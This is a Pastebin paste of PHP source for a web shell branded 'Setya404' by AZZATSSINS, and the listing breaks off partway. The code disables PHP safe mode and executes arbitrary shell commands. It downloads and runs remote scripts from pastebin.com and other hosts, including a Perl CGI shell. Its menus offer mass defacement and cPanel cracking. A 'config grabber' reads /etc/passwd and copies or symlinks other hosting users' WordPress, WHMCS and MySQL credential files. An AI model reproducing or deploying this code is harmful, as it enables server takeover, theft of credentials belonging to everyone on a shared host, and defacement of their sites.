janter13

lemper

Dec 19th, 2018
253
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 92.75 KB | None | 0 0
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12. $phi = fopen("php.ini","w+");
  13. fwrite($phi,"safe_mode = Off
  14. disable_functions = NONE
  15. safe_mode_gid = OFF
  16. open_basedir = OFF ");
  17. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  18.     @ob_clean();
  19.     $file = $_GET['file'];
  20.     header('Content-Description: File Transfer');
  21.     header('Content-Type: application/octet-stream');
  22.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  23.     header('Expires: 0');
  24.     header('Cache-Control: must-revalidate');
  25.     header('Pragma: public');
  26.     header('Content-Length: ' . filesize($file));
  27.     readfile($file);
  28.     exit;
  29. }
  30. ?>
  31. <html>
  32. <head>
  33. <title>Setya404</title>
  34. <link href='http://azzat.wap.mu/favicon.ico' rel='shortcut icon' alt='icon'>
  35. <meta name='author' content='AZZATSSINS'>
  36. <meta charset="UTF-8">
  37. <style type='text/css'>
  38. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  39. html {
  40.     background: #888888;
  41.     color: #ffffff;
  42.     font-family: 'Ubuntu';
  43.     font-size: 13px;
  44.     width: 100%;
  45. }
  46. li {
  47.     display: inline;
  48.     margin: 5px;
  49.     padding: 5px;
  50. }
  51. table, th, td {
  52.     border-collapse:collapse;
  53.     font-family: Tahoma, Geneva, sans-serif;
  54.     background: transparent;
  55.     font-family: 'Ubuntu';
  56.     font-size: 13px;
  57. }
  58. .table_home, .th_home, .td_home {
  59.     border: 1px solid #ffffff;
  60. }
  61. th {
  62.     padding: 10px;
  63. }
  64. a {
  65.     color: #ffffff;
  66.     text-decoration: none;
  67. }
  68. a:hover {
  69.     color: gold;
  70.     text-decoration: underline;
  71. }
  72. b {
  73.     color: gold;
  74. }
  75. input[type=text], input[type=password],input[type=submit] {
  76.     background: transparent;
  77.     color: #ffffff;
  78.     border: 1px solid #ffffff;
  79.     margin: 5px auto;
  80.     padding-left: 5px;
  81.     font-family: 'Ubuntu';
  82.     font-size: 13px;
  83. }
  84. textarea {
  85.     border: 1px solid #ffffff;
  86.     width: 100%;
  87.     height: 400px;
  88.     padding-left: 5px;
  89.     margin: 10px auto;
  90.     resize: none;
  91.     background: transparent;
  92.     color: #ffffff;
  93.     font-family: 'Ubuntu';
  94.     font-size: 13px;
  95. }
  96. select {
  97.     width: 152px;
  98.     background: #888888;
  99.     color: lime;
  100.     border: 1px solid #ffffff;
  101.     margin: 5px auto;
  102.     padding-left: 5px;
  103.     font-family: 'Ubuntu';
  104.     font-size: 13px;
  105. }
  106. option:hover {
  107.     background: lime;
  108.     color: #888888;
  109. }
  110. </style>
  111. </head>
  112. <?php
  113. function w($dir,$perm) {
  114.     if(!is_writable($dir)) {
  115.         return "<font color=red>".$perm."</font>";
  116.     } else {
  117.         return "<font color=lime>".$perm."</font>";
  118.     }
  119. }
  120. function r($dir,$perm) {
  121.     if(!is_readable($dir)) {
  122.         return "<font color=red>".$perm."</font>";
  123.     } else {
  124.         return "<font color=lime>".$perm."</font>";
  125.     }
  126. }
  127. function exe($cmd) {
  128.     if(function_exists('system')) {        
  129.         @ob_start();        
  130.         @system($cmd);        
  131.         $buff = @ob_get_contents();        
  132.         @ob_end_clean();        
  133.         return $buff;    
  134.     } elseif(function_exists('exec')) {        
  135.         @exec($cmd,$results);        
  136.         $buff = "";        
  137.         foreach($results as $result) {            
  138.             $buff .= $result;        
  139.         } return $buff;    
  140.     } elseif(function_exists('passthru')) {        
  141.         @ob_start();        
  142.         @passthru($cmd);        
  143.         $buff = @ob_get_contents();        
  144.         @ob_end_clean();        
  145.         return $buff;    
  146.     } elseif(function_exists('shell_exec')) {        
  147.         $buff = @shell_exec($cmd);        
  148.         return $buff;    
  149.     }
  150. }
  151. function perms($file){
  152.     $perms = fileperms($file);
  153.     if (($perms & 0xC000) == 0xC000) {
  154.     // Socket
  155.     $info = 's';
  156.     } elseif (($perms & 0xA000) == 0xA000) {
  157.     // Symbolic Link
  158.     $info = 'l';
  159.     } elseif (($perms & 0x8000) == 0x8000) {
  160.     // Regular
  161.     $info = '-';
  162.     } elseif (($perms & 0x6000) == 0x6000) {
  163.     // Block special
  164.     $info = 'b';
  165.     } elseif (($perms & 0x4000) == 0x4000) {
  166.     // Directory
  167.     $info = 'd';
  168.     } elseif (($perms & 0x2000) == 0x2000) {
  169.     // Character special
  170.     $info = 'c';
  171.     } elseif (($perms & 0x1000) == 0x1000) {
  172.     // FIFO pipe
  173.     $info = 'p';
  174.     } else {
  175.     // Unknown
  176.     $info = 'u';
  177.     }
  178.         // Owner
  179.     $info .= (($perms & 0x0100) ? 'r' : '-');
  180.     $info .= (($perms & 0x0080) ? 'w' : '-');
  181.     $info .= (($perms & 0x0040) ?
  182.     (($perms & 0x0800) ? 's' : 'x' ) :
  183.     (($perms & 0x0800) ? 'S' : '-'));
  184.     // Group
  185.     $info .= (($perms & 0x0020) ? 'r' : '-');
  186.     $info .= (($perms & 0x0010) ? 'w' : '-');
  187.     $info .= (($perms & 0x0008) ?
  188.     (($perms & 0x0400) ? 's' : 'x' ) :
  189.     (($perms & 0x0400) ? 'S' : '-'));
  190.     // World
  191.     $info .= (($perms & 0x0004) ? 'r' : '-');
  192.     $info .= (($perms & 0x0002) ? 'w' : '-');
  193.     $info .= (($perms & 0x0001) ?
  194.     (($perms & 0x0200) ? 't' : 'x' ) :
  195.     (($perms & 0x0200) ? 'T' : '-'));
  196.     return $info;
  197. }
  198. function hdd($s) {
  199.     if($s >= 1073741824)
  200.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
  201.     elseif($s >= 1048576)
  202.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
  203.     elseif($s >= 1024)
  204.     return sprintf('%1.2f',$s / 1024 ) .' KB';
  205.     else
  206.     return $s .' B';
  207. }
  208. function ambilKata($param, $kata1, $kata2){
  209.     if(strpos($param, $kata1) === FALSE) return FALSE;
  210.     if(strpos($param, $kata2) === FALSE) return FALSE;
  211.     $start = strpos($param, $kata1) + strlen($kata1);
  212.     $end = strpos($param, $kata2, $start);
  213.     $return = substr($param, $start, $end - $start);
  214.     return $return;
  215. }
  216. function getsource($url) {
  217.     $curl = curl_init($url);
  218.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  219.             curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  220.             curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  221.             curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  222.     $content = curl_exec($curl);
  223.             curl_close($curl);
  224.     return $content;
  225. }
  226.  
  227. if(get_magic_quotes_gpc()) {
  228.     function azzatssinsx($array) {
  229.         return is_array($array) ? array_map('azzatssinsx', $array) : stripslashes($array);
  230.     }
  231.     $_POST = azzatssinsx($_POST);
  232.     $_COOKIE = azzatssinsx($_COOKIE);
  233. }
  234.  
  235. if(isset($_GET['dir'])) {
  236.     $dir = $_GET['dir'];
  237.     chdir($dir);
  238. } else {
  239.     $dir = getcwd();
  240. }
  241. $kernel = php_uname();
  242. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  243. $dir = str_replace("\\","/",$dir);
  244. $scdir = explode("/", $dir);
  245. $ds = @ini_get("disable_functions");
  246. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  247. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  248. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  249. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  250. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  251. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  252. if(!function_exists('posix_getegid')) {
  253.     $user = @get_current_user();
  254.     $uid = @getmyuid();
  255.     $gid = @getmygid();
  256.     $group = "?";
  257. } else {
  258.     $uid = @posix_getpwuid(posix_geteuid());
  259.     $gid = @posix_getgrgid(posix_getegid());
  260.     $user = $uid['name'];
  261.     $uid = $uid['uid'];
  262.     $group = $gid['name'];
  263.     $gid = $gid['gid'];
  264. }
  265.  
  266. if($_GET['server'] == 'info') {
  267. echo "System: <font color=lime>".$kernel."</font><br>";
  268. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
  269. echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
  270. echo"Config File: "; if(is_readable("/etc/named.conf")){
  271.  
  272. echo '[<font color=lime>/etc/named.conf</font>] ';
  273.  
  274. }else{
  275.  
  276. echo '[<font color=red>/etc/named.conf</font>] ';
  277.  
  278. }
  279.  
  280. if(is_readable("/etc/passwd")){
  281.  
  282. echo '[<font color=lime>/etc/passwd</font>] ';
  283.  
  284. }else{
  285.  
  286. echo '[<font color=red>/etc/passwd</font>] ';
  287.  
  288. }
  289.  
  290. if(is_readable("/etc/valiases")){
  291.  
  292. echo '[<font color=lime>/etc/valiases</font>] ';
  293. }else{
  294.  
  295. echo '[<font color=red>/etc/valiases</font>] ';
  296.  
  297. }
  298.  
  299. if(is_readable("/var/named")){
  300.  
  301. echo '[<font color=lime>/var/named</font>] ';
  302. }else{
  303.  
  304. echo '[<font color=red>/var/named</font>] ';
  305.  
  306. }
  307. echo "<br>Disable Functions: $show_ds<br>";
  308. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  309. }
  310. echo "Current DIR: ";
  311. foreach($scdir as $c_dir => $cdir) {    
  312.     echo "<a href='?dir=";
  313.     for($i = 0; $i <= $c_dir; $i++) {
  314.         echo $scdir[$i];
  315.         if($i != $c_dir) {
  316.         echo "/";
  317.         }
  318.     }
  319.     echo "'>$cdir</a>/";
  320. }
  321. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]<br>";
  322.     echo "<center></fieldset>";
  323.     if($_POST['upload']) {
  324.         if($_POST['tipe_upload'] == 'biasa') {
  325.             if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  326.                 $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  327.             } else {
  328.                 $act = "<font color=red>failed to upload file</font>";
  329.             }
  330.         } else {
  331.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  332.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  333.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  334.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  335.                     $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  336.                 } else {
  337.                     $act = "<font color=red>failed to upload file</font>";
  338.                 }
  339.             } else {
  340.                 $act = "<font color=red>failed to upload file</font>";
  341.             }
  342.         }
  343.     }
  344.     echo "<form method='post' enctype='multipart/form-data'>
  345.    <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  346.    <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  347.    <input type='file' name='ix_file'>
  348.    <input type='submit' value='upload' name='upload'>
  349.    </form>";
  350.     echo $act;
  351. echo "</fieldset></center><br>";
  352. echo "<center>";
  353. echo "<fieldset><ul><b>";
  354. echo "<li>[ <a href='?'>HOME</a> ]</li>";
  355. echo "<li>[ <a href='?server=info'>SERVER INFO</a> ]</li>";
  356. echo "<li>[ <a href='?dir=$dir&do=whmcs'>WHMCS DECODER</a> ]</li>";
  357. echo "<li>[ <a href='?whmcs=killer'>WHMCS KILLER</a> ]</li>";
  358. echo "<li>[ <a href='?whmcs=remote'>WHMCS REMOTE</a> ]</li>";
  359. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>AUTO MASS</a> ]</li>";
  360. echo "<li>[ <a href='?config=grabber'>CONFIGS</a> ]</li>";
  361. echo "<li>[ <a href='?dir=$dir&do=jumping'>JUMPING</a> ]</li>";
  362. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPFTP CRACK</a> ]</li>";
  363. echo "<li>[ <a href='?dir=$dir&do=mirror'>MIRROR</a> ]</li>";
  364. echo "<li>[ <a href='?dir=$dir&do=cgi'>PERL5HELL</a> ]</li>";
  365. echo "<li>[ <a href='?mysql=connect'>MYSQL</a> ]</li><br>";
  366. echo "<li>[ <a href='?symbolic=link'>SYMLINK</a> ]</li>";
  367. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>CHANGE USER</a> ]</li>";
  368. echo "<li>[ <a style='color: red;' href='?kill=self'>KILLSELF</a> ]</li>";
  369. echo "</b></ul></fieldset>";
  370. echo "</center>";
  371. echo "<br><fieldset>";
  372.     echo "<form method='post'>
  373. <font style='text-decoration: underline;'>Command : </font>
  374. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='azx' value='>>'>
  375.    </form>    ";
  376.     if(isset($_POST['azx']))
  377. {
  378.  
  379. echo'<br><div style="background:#6d6d6d;margin:0px;padding:1px;text-align:left;color:lime;"><pre>';
  380. $cmd = $_POST['cmd'];
  381. if($cmd == "")
  382. {
  383.  
  384. echo "Please Insert Command!";
  385.  }
  386.  
  387. elseif(isset($cmd))
  388.  {
  389.  $output = exe($cmd);
  390.  echo $output; }
  391. echo'</pre></div><br><br>';
  392. }
  393. echo "</fieldset><br>";
  394. if($_GET['whmcs'] == 'killer') {
  395. echo'<form method="post">
  396. <center>
  397. <br><u>Input WHMCS configuration.php</u><br><textarea style="color:red;background-color:#888888" cols="60" name="azztssns" rows="20"></textarea><br><input
  398. style="color:red;background-color:#888888" name="conf" size="10"
  399. value="Fuck it!!!" type="submit">
  400. <br/><br/></form></center>';
  401. if ($_POST['conf']) {
  402. $configuration = $_POST['azztssns'];
  403. file_put_contents("configuration.php",$configuration,FILE_APPEND);
  404. $scr = file_get_contents("http://pastebin.com/raw/31kP3Dp8");
  405. $fel = fopen("wk.php", "w");
  406. fwrite($fel, $scr);
  407. system('wget -O wk.php http://pastebin.com/raw/31kP3Dp8');
  408. echo'<meta http-equiv="Refresh" content= "0; url=wk.php">';
  409. }
  410. }
  411. if($_GET['whmcs'] == 'remote') {
  412. echo'<meta http-equiv="Refresh" content= "0; url=http://whmremote.us.to">';
  413. }
  414. if($_GET['do'] == 'cgi') {
  415.     $cgi_dir = mkdir('azx', 0755);
  416.     $file_cgi = "azx/cgi.pl";
  417.     $isi_htcgi = "AddHandler cgi-script .pl";
  418.     $htcgi = fopen(".htaccess", "w");
  419. $cgi_script = file_get_contents("http:/x-x-x.yn.lt/pl.css");
  420.     $cgi = fopen($file_cgi, "w");
  421.     fwrite($cgi, $cgi_script);
  422.     fwrite($htcgi, $isi_htcgi);
  423.     chmod($file_cgi, 0755);
  424. system('wget -O azx/cgi.pl www.x-x-x.yn.lt/pl.css');system('chmod 0755 cgi.pl');
  425. echo'<meta http-equiv="Refresh" content= "0; url=azx/cgi.pl">';
  426.  }
  427. if($_GET['mysql']=="connect"){
  428.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  429.     function adminer($url, $isi) {
  430.         $fp = fopen($isi, "w");
  431.         $ch = curl_init();
  432.                curl_setopt($ch, CURLOPT_URL, $url);
  433.                curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  434.                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  435.                curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  436.                  curl_setopt($ch, CURLOPT_FILE, $fp);
  437.         return curl_exec($ch);
  438.                  curl_close($ch);
  439.         fclose($fp);
  440.         ob_flush();
  441.         flush();
  442.     }
  443.     if(file_exists('mysql.php')) {
  444.         echo "<center><font color=lime><a href='mysql.php' target='_blank'>KLICK DI SINI</a></font></center>";
  445.     } else {
  446.         if(adminer("http://pastebin.com/raw/hN2nDPuH","mysql.php")) {
  447.             echo "<center><font color=lime><a href='mysql.php' target='_blank'>-> KLICK DI SINI <-</a></font></center>";
  448.         } else {
  449.             echo "<center><font color=red>gagal buat file adminer</font></center>";
  450.         }
  451.     }
  452. }
  453. if($_GET['config']=="grabber"){
  454. @error_reporting(0);
  455. @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
  456. echo'<center><div style=background:black;margin:0px;padding:4px;text-align:center;color:silver;><i><b><font color=lime>&copy; </font><a
  457. href=http://fb.me/AZZATSSINS.CYBERSERKERS>AZZATSSINS CYBERSERKERS</a></b></i></div><br>
  458. <form method="post">
  459. <center>
  460. <textarea style="color:red;background-color:#888888" cols="60" name="passwd" rows="20">';
  461. $uSr=file("/etc/passwd");
  462. foreach($uSr as $usrr)
  463. {
  464. $str=explode(":",$usrr);
  465. echo $str[0]."\n";
  466. }
  467. echo system('ls /var/mail');
  468. echo system('ls /home');
  469.  
  470. echo'</textarea><br>
  471. Home :
  472. <select name="home">
  473. <option title="home" value="home">home</option>
  474. <option title="home1" value="home1">home1</option>
  475. <option title="home2" value="home2">home2</option>
  476. <option title="home3" value="home3">home3</option>
  477. <option title="home4" value="home4">home4</option>
  478. <option title="home5" value="home5">home5</option>
  479. <option title="home6" value="home6">home6</option>
  480. <option title="home7" value="home7">home7</option>
  481. <option title="home8" value="home8">home8</option>
  482. <option title="home9" value="home9">home9</option>
  483. <option title="home10" value="home10">home10</option>
  484. </select><br>
  485. .htaccess :
  486. <select name="azztssns">
  487. <option title="biasa" value="Options Indexes FollowSymLinks
  488. DirectoryIndex azzatssins.cyberserkers
  489. AddType txt .php
  490. AddHandler txt .php">Apache 1</option>
  491. <option title="Apache" value="Options all
  492. Options +Indexes
  493. Options +FollowSymLinks
  494. DirectoryIndex azzatssins.cyberserkers
  495. AddType text/plain .php
  496. AddHandler server-parsed .php
  497. AddType text/plain .html
  498. AddHandler txt .html
  499. Require None
  500. Satisfy Any">Apache 2</option>
  501. <option title="Litespeed" value="
  502. Options +FollowSymLinks
  503. DirectoryIndex azzatssins.cyberserkers
  504. RemoveHandler .php
  505. AddType application/octet-stream .php ">Litespeed</option>
  506. </select>
  507. <input style="color:red;background-color:#888888" name="conf" size="10"
  508. value="Fuck it!!!" type="submit">
  509. <br/><br/></form>';
  510. if ($_POST['conf']) {
  511. $home = $_POST['home'];
  512. $folfig = $home;
  513. @mkdir($folfig, 0755);
  514. @chdir($folfig);
  515. $htaccess = $_POST['azztssns'];
  516. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
  517. $passwd=explode("\n",$_POST["passwd"]);
  518. foreach($passwd as $pwd){ $user=trim($pwd);
  519. symlink('/','000~ROOT~000');
  520. copy('/'.$home.'/'.$user.'/.my.cnf',$user.' <~ CPANEL');
  521. symlink('/'.$home.'/'.$user.'/.my.cnf',$user.' <~ CPANEL');
  522. copy('/'.$home.'/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
  523. symlink('/'.$home.'/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
  524. copy('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
  525. symlink('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
  526. symlink('/'.$home.'/'.$user.'/public_html/.accesshash',$user.' <~ WHMCS.txt');
  527. copy('/'.$home.'/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
  528. copy('/'.$home.'/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
  529. copy('/'.$home.'/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
  530. copy('/'.$home.'/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
  531. copy('/'.$home.'/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
  532. copy('/'.$home.'/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
  533. copy('/'.$home.'/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
  534. copy('/'.$home.'/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
  535. copy('/'.$home.'/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
  536. copy('/'.$home.'/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
  537. copy('/'.$home.'/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
  538. copy('/'.$home.'/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
  539. copy('/'.$home.'/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
  540. copy('/'.$home.'/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
  541. copy('/'.$home.'/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
  542. copy('/'.$home.'/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
  543. copy('/'.$home.'/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
  544. copy('/'.$home.'/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
  545. copy('/'.$home.'/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
  546. copy('/'.$home.'/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
  547. copy('/'.$home.'/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
  548. copy('/'.$home.'/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
  549. copy('/'.$home.'/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
  550. copy('/'.$home.'/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
  551. copy('/'.$home.'/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
  552. copy('/'.$home.'/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
  553. copy('/'.$home.'/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
  554. copy('/'.$home.'/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
  555. copy('/'.$home.'/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
  556. copy('/'.$home.'/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt');
  557. copy('/'.$home.'/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
  558. copy('/'.$home.'/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
  559. copy('/'.$home.'/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
  560. copy('/'.$home.'/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
  561. copy('/'.$home.'/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
  562. copy('/'.$home.'/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
  563. copy('/'.$home.'/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
  564. copy('/'.$home.'/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
  565. copy('/'.$home.'/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
  566. copy('/'.$home.'/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
  567. copy('/'.$home.'/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
  568. copy('/'.$home.'/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
  569. copy('/'.$home.'/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
  570. copy('/'.$home.'/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
  571. copy('/'.$home.'/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
  572. copy('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
  573. copy('/'.$home.'/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
  574. copy('/'.$home.'/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
  575.  
  576. copy('/'.$home.'/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
  577. copy('/'.$home.'/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
  578. copy('/'.$home.'/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
  579. copy('/'.$home.'/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
  580. copy('/'.$home.'/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
  581. copy('/'.$home.'/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
  582. copy('/'.$home.'/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
  583. copy('/'.$home.'/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
  584. copy('/'.$home.'/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
  585. copy('/'.$home.'/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
  586. copy('/'.$home.'/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
  587. copy('/'.$home.'/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
  588. copy('/'.$home.'/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
  589. copy('/'.$home.'/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
  590. symlink('/'.$home.'/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
  591. symlink('/'.$home.'/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
  592. symlink('/'.$home.'/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
  593. symlink('/'.$home.'/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
  594. symlink('/'.$home.'/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
  595. symlink('/'.$home.'/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
  596. symlink('/'.$home.'/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
  597. symlink('/'.$home.'/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
  598. symlink('/'.$home.'/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
  599. symlink('/'.$home.'/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
  600. symlink('/'.$home.'/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
  601. symlink('/'.$home.'/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
  602. symlink('/'.$home.'/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
  603. symlink('/'.$home.'/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
  604. symlink('/'.$home.'/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
  605. symlink('/'.$home.'/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
  606. symlink('/'.$home.'/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
  607. symlink('/'.$home.'/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
  608. symlink('/'.$home.'/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
  609. symlink('/'.$home.'/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
  610. symlink('/'.$home.'/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
  611. symlink('/'.$home.'/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
  612. symlink('/'.$home.'/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
  613. symlink('/'.$home.'/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
  614. symlink('/'.$home.'/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
  615. symlink('/'.$home.'/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
  616. symlink('/'.$home.'/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
  617. symlink('/'.$home.'/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
  618. symlink('/'.$home.'/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
  619. symlink('/'.$home.'/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt');
  620. symlink('/'.$home.'/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
  621. symlink('/'.$home.'/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
  622. symlink('/'.$home.'/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
